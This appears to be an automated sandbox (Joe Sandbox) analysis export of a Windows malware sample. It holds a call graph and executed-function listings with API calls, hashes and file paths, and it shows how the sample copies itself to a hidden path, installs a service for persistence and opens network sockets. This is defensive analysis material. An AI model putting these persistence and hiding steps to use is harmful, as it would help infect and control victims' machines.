10784->10783 11109 9dd500 lstrlen 10785->11109 10787 9f0f89 10787->10708 10789 9f110c 11111 9dd500 lstrlen 10789->11111 10791 9f0f6d 10791->10787 11110 9dd500 lstrlen 10791->11110 10792 9f2250 10792->10708 10793 9f111a 10793->10792 10794 9d2f90 2 API calls 10793->10794 10795 9f1195 10794->10795 10796 9dd530 9 API calls 10795->10796 10797 9f11c3 10796->10797 10798 9e1bb0 2 API calls 10797->10798 10799 9f11d5 10798->10799 10801 9d2f90 2 API calls 10799->10801 10828 9f134c 10799->10828 10800 a001a0 9 API calls 10802 9f13d8 10800->10802 10803 9f1226 10801->10803 10804 a01050 8 API calls 10802->10804 10806 9ea810 9 API calls 10803->10806 10805 9f13e4 10804->10805 10807 9d2f90 2 API calls 10805->10807 10808 9f1258 10806->10808 10809 9f1422 10807->10809 10811 9e1bb0 2 API calls 10808->10811 10810 a001a0 9 API calls 10809->10810 10812 9f144a 10810->10812 10815 9f1288 10811->10815 10813 a01050 8 API calls 10812->10813 10814 9f1456 10813->10814 10816 9e1bb0 2 API calls 10814->10816 10817 9fb500 8 API calls 10815->10817 10815->10828 10818 9f1478 10816->10818 10819 9f12fa 10817->10819 10822 a001a0 9 API calls 10818->10822 10820 9d2f90 2 API calls 10819->10820 10821 9f1310 10820->10821 10823 9dd530 9 API calls 10821->10823 10824 9f14e2 10822->10824 10825 9f1328 10823->10825 10826 a01050 8 API calls 10824->10826 10827 9e1bb0 2 API calls 10825->10827 10829 9f14f1 10826->10829 10827->10828 10828->10800 10832 9d2f90 2 API calls 10829->10832 10868 9f16c2 10829->10868 10830 9d2f90 2 API calls 10831 9f1702 10830->10831 10833 a001a0 9 API calls 10831->10833 10834 9f1595 10832->10834 10835 9f1728 10833->10835 10837 a001a0 9 API calls 10834->10837 10836 a01050 8 API calls 10835->10836 10838 9f1734 10836->10838 10839 9f15d0 10837->10839 10842 9e1bb0 2 API calls 10838->10842 10840 a01050 8 API calls 10839->10840 10841 9f15df 10840->10841 10845 9d2f90 2 API calls 10841->10845 10843 9f174e 10842->10843 10844 9f1786 socket 10843->10844 10846 a01050 8 API calls 10843->10846 10847 9f17de 10844->10847 10848 9f17b2 10844->10848 10849 9f1600 10845->10849 10846->10844 10850 9f17fb setsockopt 10847->10850 10851 9f18c4 gethostbyname 10847->10851 10848->10708 10852 9e1bb0 2 API calls 10849->10852 10854 9f1866 10850->10854 10851->10792 10853 9f18ed inet_ntoa inet_addr htons connect 10851->10853 10855 9f1628 10852->10855 10857 9f19ca 10853->10857 10861 9f19e0 10853->10861 10854->10851 10858 a05820 wvsprintfA 10855->10858 10857->10708 10859 9f165e 10858->10859 10860 9e1bb0 2 API calls 10859->10860 10862 9f167a 10860->10862 10863 9f1a00 send 10861->10863 10864 a001a0 9 API calls 10862->10864 10867 9f1a1e 10863->10867 10865 9f16b3 10864->10865 10866 a01050 8 API calls 10865->10866 10866->10868 10869 9ed990 8 API calls 10867->10869 10871 9f1a3e 10867->10871 10868->10830 10870 9f1add recv 10869->10870 10872 9f21ad closesocket 10870->10872 10883 9f1b57 10870->10883 10871->10708 10874 9f2210 10872->10874 10874->10792 10875 9fb500 8 API calls 10874->10875 10875->10792 10876 9e0110 8 API calls 10876->10883 10877 9e4290 8 API calls 10877->10883 10878 9f2135 recv 10879 9f2187 10878->10879 10878->10883 10879->10872 10881 9d2f90 GetProcessHeap RtlAllocateHeap 10881->10883 10882 9ea810 9 API calls 10882->10883 10883->10872 10883->10876 10883->10877 10883->10878 10883->10879 10883->10881 10883->10882 10884 9e1bb0 GetProcessHeap RtlFreeHeap 10883->10884 11112 9d1df0 10883->11112 11116 9dc110 10883->11116 10884->10883 10886 9e08db 10885->10886 10889 9e7ed0 10886->10889 10890 9e7eec 10889->10890 10891 9f4420 8 API calls 10890->10891 10892 9d2f17 10891->10892 10892->10717 10894 9ff5be 10893->10894 10902 9de83f 10894->10902 10942 9d21f0 10894->10942 10898 9ff77d 10899 9ff6bd 10898->10899 10952 9edcf0 10898->10952 10972 9d2f20 10899->10972 10902->10740 10903 9ff882 10960 a00220 10903->10960 10906 9ed83c GetModuleFileNameA 10905->10906 10908 9de9cb 10906->10908 10908->10747 10908->10748 10910 9dffcb 10909->10910 10911 9deaeb 10910->10911 10912 9e0920 9 API calls 10910->10912 10913 9e7ff0 10911->10913 10912->10911 10916 9e8035 10913->10916 10914 9deb0c 10914->10766 10915 9dff90 9 API calls 10915->10916 10916->10914 10916->10915 10917->10771 10919 9e823e 10918->10919 10920 9e8465 CreatePipe 10919->10920 10921 9e848a 10920->10921 10922 9e8499 SetHandleInformation CreatePipe 10920->10922 10924 9ed990 8 API calls 10921->10924 10927 9ded18 DeleteFileA 10921->10927 10925 9e85cd SetHandleInformation 10922->10925 10926 9e858a 10922->10926 10924->10927 10930 9e860f 10925->10930 10928 9e87e3 CloseHandle 10926->10928 10927->10777 10928->10921 10929 9e87fd CloseHandle 10928->10929 10929->10921 10931 9e8719 CreateProcessA 10930->10931 10932 9e8777 10931->10932 10933 9e885c WriteFile 10932->10933 10934 9e8789 CloseHandle CloseHandle 10932->10934 10933->10934 10936 9e88dd CloseHandle CloseHandle 10933->10936 10934->10928 10937 9e893e 10936->10937 11101 9d23a0 10937->11101 10940 9e89e6 CloseHandle CloseHandle 10941 9e89b2 10941->10940 10943 9d221e 10942->10943 10944 9f3a80 4 API calls 10943->10944 10945 9d22ae 10944->10945 10946 9f8b60 4 API calls 10945->10946 10947 9d22d1 10945->10947 10946->10947 10947->10899 10948 9f8b60 10947->10948 10949 9f8b95 10948->10949 10950 9f3a80 4 API calls 10949->10950 10951 9f8be0 10950->10951 10951->10898 10953 9edd26 10952->10953 10975 9dbfa0 10953->10975 10957 9edd68 10987 a00a90 10957->10987 10959 9edd93 10959->10903 10961 a0022d 10960->10961 10963 a003d0 10961->10963 10999 9dc6b0 10961->10999 10963->10899 10964 a00369 10964->10963 10966 9d2f90 2 API calls 10964->10966 10971 a00613 10964->10971 10965 9d2f90 2 API calls 10970 a005e4 10965->10970 10968 a005c8 10966->10968 10967 a00713 10967->10899 10969 9e1bb0 2 API calls 10968->10969 10968->10970 10969->10971 10970->10899 10971->10965 10971->10967 10973 9d1170 2 API calls 10972->10973 10974 9d2f63 10973->10974 10974->10902 10976 9dc008 10975->10976 10977 9d2f90 2 API calls 10976->10977 10978 9dc048 10977->10978 10979 9e1bb0 2 API calls 10978->10979 10980 9dc072 10979->10980 10981 9e4db0 10980->10981 10982 9e4dfc 10981->10982 10983 9e50de 10981->10983 10984 9e4f9c 10982->10984 10993 9f4ea0 10982->10993 10983->10957 10984->10983 10985 9f4ea0 4 API calls 10984->10985 10985->10984 10988 a00ab6 10987->10988 10989 9e4db0 4 API calls 10988->10989 10990 a00dd8 10989->10990 10991 9e4db0 4 API calls 10990->10991 10992 a00e55 10991->10992 10992->10959 10994 9f4f16 10993->10994 10995 9d2f90 2 API calls 10994->10995 10996 9f5042 10995->10996 10997 9e1bb0 2 API calls 10996->10997 10998 9f53e8 10997->10998 10998->10984 11000 9dc6f6 10999->11000 11001 9d21f0 4 API calls 11000->11001 11003 9dc722 11001->11003 11002 9d1170 2 API calls 11005 9dc8d2 11002->11005 11004 9dc74d 11003->11004 11007 9dc79a 11003->11007 11010 9dc813 11003->11010 11006 9d1170 2 API calls 11004->11006 11005->10964 11008 9dc772 11006->11008 11011 9e30f0 11007->11011 11008->10964 11010->11002 11013 9e313f 11011->11013 11012 9e40b3 11012->11010 11013->11012 11014 9f3a80 4 API calls 11013->11014 11015 9e338d 11014->11015 11017 9f3a80 4 API calls 11015->11017 11043 9e3959 11015->11043 11016 9e4009 11018 9e403e 11016->11018 11019 9e404a 11016->11019 11020 9e33ef 11017->11020 11022 9d1170 2 API calls 11018->11022 11023 9d1170 2 API calls 11019->11023 11024 9f3a80 4 API calls 11020->11024 11020->11043 11021 9d1170 2 API calls 11021->11043 11026 9e4045 11022->11026 11023->11026 11025 9e343c 11024->11025 11027 9f8b60 4 API calls 11025->11027 11036 9e3469 11025->11036 11025->11043 11026->11010 11028 9e349c 11027->11028 11028->11043 11047 a01190 11028->11047 11030 9e35e7 11034 9e2c90 4 API calls 11030->11034 11031 9e35d4 11032 9dad30 4 API calls 11031->11032 11037 9e35e2 11032->11037 11034->11037 11036->11030 11036->11031 11036->11043 11038 9e2c90 4 API calls 11037->11038 11039 9e363c 11038->11039 11040 9f3a80 4 API calls 11039->11040 11039->11043 11041 9e3750 11040->11041 11042 9e2c90 4 API calls 11041->11042 11041->11043 11045 9e3813 11042->11045 11043->11016 11043->11021 11044 9f3a80 4 API calls 11044->11045 11045->11043 11045->11044 11046 9e2c90 4 API calls 11045->11046 11046->11045 11048 a011d8 11047->11048 11049 9f3a80 4 API calls 11048->11049 11050 9e34da 11048->11050 11049->11050 11050->11043 11051 9dad30 11050->11051 11052 9dad45 11051->11052 11059 9ef160 11052->11059 11054 9dad8b 11055 9f0790 4 API calls 11054->11055 11056 9dae1f 11054->11056 11058 9dade7 11054->11058 11055->11054 11056->11036 11057 9fab60 4 API calls 11057->11058 11058->11056 11058->11057 11061 9ef1b5 11059->11061 11060 9ef1bc 11060->11054 11061->11060 11062 9ef27a 11061->11062 11063 9ef322 11061->11063 11064 9ef2bb 11062->11064 11065 9f8b60 4 API calls 11062->11065 11067 9e2c90 4 API calls 11063->11067 11066 9ef2f8 11064->11066 11068 9e2c90 4 API calls 11064->11068 11093 9ef2eb 11064->11093 11065->11064 11066->11054 11069 9ef392 11067->11069 11068->11093 11071 9e2c90 4 API calls 11069->11071 11069->11093 11070 9d1170 2 API calls 11072 9f0425 11070->11072 11073 9ef3d9 11071->11073 11072->11054 11074 9f3a80 4 API calls 11073->11074 11073->11093 11075 9ef440 11074->11075 11076 9f8b60 4 API calls 11075->11076 11075->11093 11077 9ef461 11076->11077 11078 9f3a80 4 API calls 11077->11078 11077->11093 11079 9ef485 11078->11079 11080 9f3a80 4 API calls 11079->11080 11079->11093 11081 9ef4a7 11080->11081 11082 a01190 4 API calls 11081->11082 11083 9ef5fa 11081->11083 11081->11093 11084 9ef5a0 11082->11084 11085 a01190 4 API calls 11083->11085 11083->11093 11086 a01190 4 API calls 11084->11086 11084->11093 11089 9ef6df 11085->11089 11086->11083 11087 9fab60 4 API calls 11087->11089 11088 9f024a 11090 9e2c90 4 API calls 11088->11090 11091 9f0299 11088->11091 11089->11087 11096 9ef7e0 11089->11096 11090->11091 11092 9e2c90 4 API calls 11091->11092 11091->11093 11092->11093 11093->11066 11093->11070 11094 9e8bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11094->11096 11095 9f8b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11095->11096 11096->11088 11096->11093 11096->11094 11096->11095 11097 9fab60 4 API calls 11096->11097 11098 9e2c90 4 API calls 11096->11098 11099 a01190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11096->11099 11100 9f0790 4 API calls 11096->11100 11097->11096 11098->11096 11099->11096 11100->11096 11102 9d23ad 11101->11102 11103 9ed990 8 API calls 11102->11103 11104 9d23f2 ReadFile 11103->11104 11105 9d24c1 WaitForSingleObject 11104->11105 11106 9d2452 11104->11106 11105->10940 11105->10941 11106->11105 11107 9e4290 8 API calls 11106->11107 11108 9d247e ReadFile 11107->11108 11108->11105 11108->11106 11109->10791 11110->10789 11111->10793 11113 9d1e0f 11112->11113 11115 9d1e37 11112->11115 11114 a008b0 GetSystemTimeAsFileTime 11113->11114 11114->11115 11115->10883 11117 9dc152 11116->11117 11118 9d2f90 2 API calls 11117->11118 11119 9dc193 11118->11119 11120 9ea810 9 API calls 11119->11120 11121 9dc1d1 11120->11121 11122 9e1bb0 2 API calls 11121->11122 11123 9dc205 11122->11123 11124 9dc218 11123->11124 11125 9d2f90 2 API calls 11123->11125 11124->10883 11126 9dc245 11125->11126 11127 9ea810 9 API calls 11126->11127 11128 9dc29b 11127->11128 11129 9e1bb0 2 API calls 11128->11129 11130 9dc2f8 11129->11130 11130->10883 11352 9fb3c0 11353 9e2a80 8 API calls 11352->11353 11354 9fb3d9 11353->11354 11355 a01050 8 API calls 11354->11355 11356 9fb42e 11355->11356 11131 9f6a7b 11132 9f6a8c 11131->11132 11133 9f7846 11132->11133 11134 9f77c2 11132->11134 11148 9f5706 11132->11148 11136 9f793b 11133->11136 11137 9f7852 11133->11137 11135 a05820 wvsprintfA 11134->11135 11135->11148 11138 9f79a8 11136->11138 11140 9f7957 11136->11140 11139 9f78c5 11137->11139 11141 9f786e 11137->11141 11142 a05820 wvsprintfA 11138->11142 11143 a05820 wvsprintfA 11139->11143 11144 a05820 wvsprintfA 11140->11144 11140->11148 11145 a05820 wvsprintfA 11141->11145 11141->11148 11142->11148 11143->11148 11144->11148 11145->11148 11146 9f86f1 11148->11146 11149 9dd500 lstrlen 11148->11149 11149->11148 11150 9e3874 11151 9e3880 11150->11151 11152 9f3a80 4 API calls 11151->11152 11156 9e2c90 4 API calls 11151->11156 11161 9e3959 11151->11161 11152->11151 11153 9e4009 11154 9e403e 11153->11154 11155 9e404a 11153->11155 11158 9d1170 2 API calls 11154->11158 11159 9d1170 2 API calls 11155->11159 11156->11151 11157 9d1170 2 API calls 11157->11161 11160 9e4045 11158->11160 11159->11160 11161->11153 11161->11157 11357 9e6ff0 11358 9e700d 11357->11358 11367 9dd500 lstrlen 11358->11367 11360 9e7083 11361 9e0110 8 API calls 11360->11361 11362 9e7099 11361->11362 11363 9d1ca0 9 API calls 11362->11363 11364 9e70ac 11363->11364 11365 9f3080 8 API calls 11364->11365 11366 9e70d0 11365->11366 11367->11360 9415 9f44e7 9416 9f44f0 9415->9416 9418 9f457d 9416->9418 9419 9e0920 9416->9419 9420 9e0945 9419->9420 9436 9f3110 9420->9436 9424 9e0b2c 9426 9e0c03 CryptGenRandom 9424->9426 9435 9e0c1a 9424->9435 9425 9e0a68 GetProcAddress 9427 9e0aa7 9425->9427 9426->9435 9428 9d2f90 2 API calls 9427->9428 9429 9e0ad3 9428->9429 9444 9e1bb0 9429->9444 9434 9e1bb0 2 API calls 9434->9424 9448 9ffcc0 9435->9448 9438 9f312e WaitForSingleObject 9436->9438 9439 9e0a18 9438->9439 9439->9424 9440 9d2f90 9439->9440 9441 9d2feb 9440->9441 9452 9de2c0 9441->9452 9443 9d3034 9443->9425 9445 9e1bd0 9444->9445 9455 9e2eb0 GetProcessHeap RtlFreeHeap 9445->9455 9449 9ffcdb 9448->9449 9450 9ffce5 ReleaseMutex 9448->9450 9449->9450 9451 9e0d8e 9450->9451 9451->9416 9453 9de2e4 9452->9453 9454 9de2f2 GetProcessHeap RtlAllocateHeap 9452->9454 9453->9454 9454->9443 9456 9e0ae7 GetProcAddress 9455->9456 9456->9434 10601 9f66e7 10602 9f679c 10601->10602 10606 9f5706 10602->10606 10608 9dd500 lstrlen 10602->10608 10604 9f86f1 10606->10604 10607 9dd500 lstrlen 10606->10607 10607->10606 10608->10606 11426 9d2764 11427 9d2770 Sleep 11426->11427 11429 9d279b 11427->11429 11428 a008b0 GetSystemTimeAsFileTime 11428->11429 11429->11427 11429->11428 11430 9d27c8 11429->11430 10609 9f44e5 10610 9f44f0 10609->10610 10611 9e0920 9 API calls 10610->10611 10612 9f457d 10610->10612 10611->10610 11166 9e1860 11167 9e187d 11166->11167 11168 9e189b SetServiceStatus 11167->11168 11170 9e18cb SetServiceStatus SetEvent 11167->11170 11171 9e18c1 11167->11171 11171->11170 11379 9f55e0 11380 9f5643 11379->11380 11383 9f5679 11379->11383 11381 9f56c7 11383->11381 11384 9dd500 lstrlen 11383->11384 11384->11383

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 009D7A04 Relevance: 63.6, APIs: 29, Strings: 6, Instructions: 2326sleepfilesynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(00000000,C:\Users\user,00000104), ref: 009D83DA
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 009D8448
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 009D84DC
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 009D84F7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 009D8599
                                                                                                                                                                                                              • Part of subcall function 009E5200: GetVersionExA.KERNEL32(00A5AE70), ref: 009E52CC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000D05), ref: 009D8B70
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 009D8DAC
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 009D8E86
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 009D8E9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 009D8EC3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000002), ref: 009D912B
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 009D9186
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 009D9265
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?), ref: 009D9370
                                                                                                                                                                                                              • Part of subcall function 009DA4E0: lstrlen.KERNEL32(?), ref: 009DA4FE
                                                                                                                                                                                                              • Part of subcall function 009DD500: lstrlen.KERNEL32(?,?,009DD630,?), ref: 009DD523
                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000004,00000005,?), ref: 009D96D4
                                                                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 009D995E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000134), ref: 009D9AC8
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000080), ref: 009D9AEC
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 009D9B0C
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000002), ref: 009D9B3B
                                                                                                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 009D9C52
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 009D8CB2
                                                                                                                                                                                                              • Part of subcall function 009DBBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009DBC90
                                                                                                                                                                                                              • Part of subcall function 009DBBC0: Process32First.KERNEL32(00000000,?), ref: 009DBCE3
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 009D86AE
                                                                                                                                                                                                              • Part of subcall function 009D2800: ExitProcess.KERNEL32 ref: 009D2842
                                                                                                                                                                                                              • Part of subcall function 00A008B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00A00929
                                                                                                                                                                                                              • Part of subcall function 00A008B0: __aulldiv.LIBCMT ref: 00A00953
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 009D9E32
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(C:\whfkpbh\amdrhfskpcu.exe,00000080), ref: 009D9E88
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,C:\whfkpbh\amdrhfskpcu.exe,00000000), ref: 009D9EA6
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(C:\whfkpbh\amdrhfskpcu.exe,00000002), ref: 009D9EC5
                                                                                                                                                                                                              • Part of subcall function 009E0500: OpenSCManagerA.SECHOST(00000000,00000000,00000002), ref: 009E0537
                                                                                                                                                                                                              • Part of subcall function 009E0500: CreateServiceA.ADVAPI32(00000000,012A0610,012A0610,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 009E0596
                                                                                                                                                                                                              • Part of subcall function 009E0500: ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 009E0615
                                                                                                                                                                                                              • Part of subcall function 009E0500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 009E062A
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000222A0,00000000,00000000,00000000), ref: 009DA26A
                                                                                                                                                                                                            • Sleep.KERNEL32(0000C350), ref: 009DA327
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Attributes$CreateSleep$CopyMutexService$CommandLineModuleNameTimelstrlen$ChangeCloseConfig2CountEnvironmentExitFirstHandleManagerMessageOpenProcessProcess32SnapshotStartStartupSystemThreadTickToolhelp32VariableVersion__aulldiv
                                                                                                                                                                                                            • String ID: zS$%Tmd$C:\Users\user$C:\whfkpbh\amdrhfskpcu.exe$@L$}en
                                                                                                                                                                                                            • API String ID: 3864866415-903891288
                                                                                                                                                                                                            • Opcode ID: 29acd2b1c1a1010f2ce0f3ba3a617ec4e4b6e625a0da83f8dd31f2acc6b593f7
                                                                                                                                                                                                            • Instruction ID: 685f115f23c1d45fb74e56f843a3ebb737ccc7f35c10c3f1a43edcfe6a207124
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29acd2b1c1a1010f2ce0f3ba3a617ec4e4b6e625a0da83f8dd31f2acc6b593f7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 852333B9A00300DFD704EFE4FD86AA63BB4F7D9301B11851AE542962B5EB7588A3CF51
                                                                                                                                                                                                            Function 009E5200 Relevance: 30.9, APIs: 12, Strings: 5, Instructions: 1106fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 492 9e5200-9e528c call a00a20 495 9e528e-9e52ac 492->495 496 9e52b2-9e5338 GetVersionExA call 9db7a0 call 9dfbc0 492->496 495->496 501 9e533e-9e5397 call 9df0d0 496->501 502 9e5598-9e5602 496->502 508 9e53ab-9e5405 501->508 509 9e5399-9e53a5 501->509 504 9e562d-9e56d0 call 9d2f90 call 9dd530 call 9e1bb0 call 9dd670 call 9ddef0 call 9e1d90 502->504 505 9e5604-9e5626 502->505 535 9e575d 504->535 536 9e56d6-9e575b DeleteFileA RemoveDirectoryA 504->536 505->504 511 9e541f-9e5446 call 9dc580 508->511 512 9e5407-9e5419 508->512 509->508 518 9e5448-9e5482 511->518 519 9e5496-9e54b6 CreateDirectoryA call 9d2f90 511->519 512->511 518->519 521 9e5484-9e5490 518->521 524 9e54bb-9e554d call 9dc580 call 9e1bb0 519->524 521->519 524->504 534 9e5553-9e5564 524->534 537 9e5566-9e5570 534->537 538 9e5575-9e5593 534->538 539 9e5760-9e57c9 call 9df0d0 535->539 536->539 537->504 538->504 542 9e580c-9e5883 call 9dc580 CreateDirectoryA call 9d13e0 539->542 543 9e57cb-9e57e0 539->543 550 9e58ad-9e5915 call 9de430 CreateDirectoryA 542->550 551 9e5885-9e58a3 542->551 544 9e5802 543->544 545 9e57e2-9e5800 543->545 544->542 545->542 554 9e5917 550->554 555 9e5921-9e5964 call 9d2f90 550->555 551->550 554->555 558 9e597b-9e59af call 9dc580 555->558 559 9e5966-9e5975 555->559 562 9e59c5-9e59d7 558->562 563 9e59b1-9e59c3 558->563 559->558 564 9e59dd-9e5a35 call 9d2f90 call 9e1bb0 562->564 563->564 569 9e5a5a-9e5a67 564->569 570 9e5a37-9e5a58 564->570 571 9e5a6e-9e5a8b call 9dd530 569->571 570->571 574 9e5a8d-9e5a9b 571->574 575 9e5aa2-9e5adc call 9e1bb0 call 9dd670 call 9ddef0 call 9e1d90 571->575 574->575 584 9e64f5-9e650b 575->584 585 9e5ae2-9e5b01 575->585 588 9e650d-9e6517 584->588 589 9e6519-9e6537 584->589 586 9e5b07-9e5b75 call 9d2f90 call a05820 585->586 587 9e5c42-9e5cec call 9d2f90 call a05820 call 9e1bb0 585->587 605 9e5b97-9e5bd0 call 9e1bb0 586->605 606 9e5b77-9e5b90 586->606 611 9e5d0e 587->611 612 9e5cee-9e5d0c 587->612 592 9e653d-9e657c call 9de430 SetFileAttributesA 588->592 589->592 599 9e657e-9e6596 592->599 600 9e659c-9e65ce call 9fa7e0 call 9de310 592->600 599->600 616 9e5c1f-9e5c3d 605->616 617 9e5bd2-9e5be4 605->617 606->605 615 9e5d10-9e5db5 call 9dc580 CreateDirectoryA call 9d13e0 611->615 612->615 623 9e5e1c-9e5e37 615->623 624 9e5db7-9e5de6 615->624 616->615 617->615 619 9e5bea-9e5c1a 617->619 619->615 625 9e5e39 623->625 626 9e5e43-9e5ec2 call 9de430 CreateDirectoryA call 9d2f90 623->626 627 9e5e08-9e5e1a 624->627 628 9e5de8-9e5e06 624->628 625->626 633 9e5ed4-9e5f12 call 9dc580 626->633 634 9e5ec4-9e5ecf 626->634 627->626 628->626 637 9e5f14-9e5f2a 633->637 638 9e5f40-9e5fa0 call 9d2f90 call 9e1bb0 call 9dd530 633->638 634->633 637->638 639 9e5f2c-9e5f39 637->639 646 9e5fc7-9e6007 call 9e1bb0 call 9dd670 call 9ddef0 call 9e1d90 638->646 647 9e5fa2-9e5fbb 638->647 639->638 657 9e600d-9e606b GetTempPathA call 9dd500 646->657 658 9e64e1-9e64ee 646->658 647->646 648 9e5fbd 647->648 648->646 661 9e6169-9e61ea call 9d13e0 call 9de430 657->661 662 9e6071-9e607d 657->662 658->584 677 9e61ec 661->677 678 9e61f6-9e6217 CreateDirectoryA 661->678 663 9e607f-9e608c 662->663 664 9e6092-9e609a 662->664 663->664 667 9e609c-9e60b4 664->667 668 9e60da-9e60fe 664->668 670 9e60b6-9e60c9 667->670 671 9e60d0-9e60d3 667->671 672 9e610a-9e615d 668->672 673 9e6100 668->673 670->671 671->662 675 9e60d5 671->675 672->661 676 9e615f 672->676 673->672 675->661 676->661 677->678 679 9e622b-9e62db call 9d2f90 call 9dc580 call 9d2f90 678->679 680 9e6219-9e6225 678->680 687 9e62dd-9e62ee 679->687 688 9e62fa-9e6342 call 9e1bb0 679->688 680->679 687->688 690 9e62f0 687->690 692 9e6357-9e63ba call 9dd530 call 9e1bb0 call 9dd670 call 9ddef0 call 9e1d90 688->692 693 9e6344-9e6351 688->693 690->688 704 9e64a5-9e64db 692->704 705 9e63c0-9e6441 GetTempPathA call 9d13e0 call 9d2f90 692->705 693->692 704->658 710 9e6455-9e649e call 9dc580 call 9e1bb0 705->710 711 9e6443-9e644f 705->711 710->704 711->710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(00A5AE70), ref: 009E52CC
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 009E549F
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 009E56FE
                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00000000), ref: 009E5743
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 009E583A
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 009E58F3
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 009E5D71
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 009E5E82
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 009E6029
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 009E61FF
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 009E63DE
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000002), ref: 009E655F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
